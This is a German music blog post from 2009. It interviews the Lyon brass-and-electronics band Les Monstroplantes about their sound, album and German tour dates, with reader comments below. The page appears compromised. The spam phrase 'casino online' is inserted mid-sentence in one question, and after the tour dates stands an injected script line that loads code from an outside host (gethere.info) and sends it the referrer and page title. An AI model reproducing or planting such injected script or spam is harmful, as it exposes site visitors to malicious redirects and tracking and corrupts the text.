Organisch, synthetisch, französisch: Les Monstroplantes

Freitag, Oktober 30, 2009
Von tobi

jayce_and_the_wheeled_warriors_saw_bossDie Les Monstroplantes aus Lyon hätten sich keinen passenderen Namen geben können. Denn die „Monsterpflanzen“ aus der TV Serie „Jayce and the Wheeled Warriors„, nach denen sich sich benannt haben, sind eine ziemlich fiese Spezies. Durch ein misslungenes Experiment zu einem Schicksal als Gemüse – Mensch – Mix verdammt (im Bild: Sawboss, der Ober-Bösewicht), kennt ihre traurige Existenz nur ein Ziel: die Auslöschung der Menschen, in der Serie „Lightning League“ genannt.

Auch die „Les Monstroplantes“ sind so eine etwas eigenartige Mischung. Einerseits arbeiten sie mit Beats und Basslines, die rein elektronischen Ursprungs sind und ähnlich wie im Hip Hop und in der elektronischen Tanzmusik von einem DJ eingespielt werden. Andererseits aber besteht der Großteil der Band aus einer Bläsersektion, welche zwischen Big Band, Brass und Balkan Sounds der Musik eine sehr organische Seite verleiht. Gesang bzw. Rap und einige Percussion – Einlagen kommen unterstützend mit dazu. Das Ergebnis ist eine ziemlich eigene Melange, welche die Band selbst „Drum „n Brass“ nennt – zum Teil organisch, zum Teil künstlich. Nun sind die „Monstroplantes“ nicht unbedingt darauf aus, den guten Teil der Menschheit auf diesem Planten auszulöschen. Ihre Musik allerdings kann man durchaus als Kampfansage an alles „straighte“ oder „reine“ betrachten und als Aufforderung, vermeintlich Unpassendes zusammenzufügen.

Obwohl sie mit erst einer veröffentlichten EP noch ziemlich am Anfang ihrer Karriere stehen, machen sich „Les Monstoplanes“ Anfang November auf den Weg nach Deutschland, um dort ihre eigenwillige aber auf jeden Fall tanzbare Musik live zu präsentieren. Kurz bevor es losgeht, haben wir mit den Les Monstroplantes über ihre Musik, das Album und die Tour gesprochen:

Eure Musik ist eine ziemlich spannende Kombination casino online verschiedener musikalischer Stile. Wie seid Ihr denn dazu gekommen?

Am Anfang waren die Les Monstroplantes eine Street Brass Band. Dann trafen wir Lakaskad, unseren DJ, der die Elektronik in unsere Musik brachte. Seine Einflüße wie Hip Hop, Drum&Bass und Elektrofunk gemischt mit den Referenzen der ursprünglichen Band ergaben einen sehr eigenen Sound, den wir „Drum%Brass“ nannten. Aus diesem Grund ist unser Publikum auch sehr vielschichtig und unterschiedlich: manche finden Reggae oder Dub, andere Rhythm&Blues, Soul oder Jazz-Anleihen mit den Bläsern in unserer Musik, wie andere hören Otis Reading oder Zack de la Rocha in den Einflüssen unseres Sängers Supajud.

Ihr schreibt, dass Ihr bald Euer Album aufnehmen möchtet, aber noch auf der Suche nach Sponsoren seid. Wie stehts damit?

Ja, wir nehmen zur Zeit unser erstes Album auf. In Frankreich wird es im Sommer 2010 erscheinen. Sponsoren haben wir keine gefunden, aber wir arbeiten wie Hunde um es zu produzieren. Wir dürfen das Studio unsere Freunde von der Band “Le Peuple de l’herbe” benützen, das hilft uns schon sehr. Wir hoffen, dass wir das Album auch in Deutschland sehr bald vorstellen können.

Das Berliner Publikum – sagen manche Künstler – ist gerne ein bisschen zurückhaltend. Was habt Ihr vor, um die Menschen im Maschinenhaus aus der Reserve zu locken?

Wir wissen, dass das deutsche Publikum eine starke Vorliebe für Brass Bands hat. Und die Les Monstroplantes sind eine Brass Band des 21. Jahrhunderts! Ein Sound, den man zuvor nicht gehört hat, zudem von sehr guten Musikern….ziemlich unglaublich. Die Band hat eine sehr spezielle Energie, die man nicht so leicht vergisst. Wir sehen uns in Berlin am 3. November! Peace!

Die Tourdaten der „Les Monstroplantes“ in Deutschland:les_monstroplantes

03.11. Berlin – Maschinenhaus
04.11. Kassel – Schlachthof
05.11. Neu Tramm – Raum 2
06.11. Lübeck – Treibsand
07.11. Halle – Labim


s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;

Tags: , , , ,

3 Kommentare zu “Organisch, synthetisch, französisch: Les Monstroplantes”

  1. winterpotatos

    ört sisch süpär an! isch wärdö kommän

    #315
  2. hannes

    Ja klingt gut. Auch der Sound der Band interessiert mich. Aber warum ist das Konzert denn im Maschinenhaus? Ich kann dieses ganze Kulturbrauerei Gelände überhaupt nicht ab. Na ja, soll jetzt mal kein Hindernis sein. Nächstes Mal aber bitte woanders!

    #316
  3. taxmax

    wow – das war ma was ganz anderes
    mir gefällt die mukke irgendwie, freu mich schon aufs album

    #317

Suchen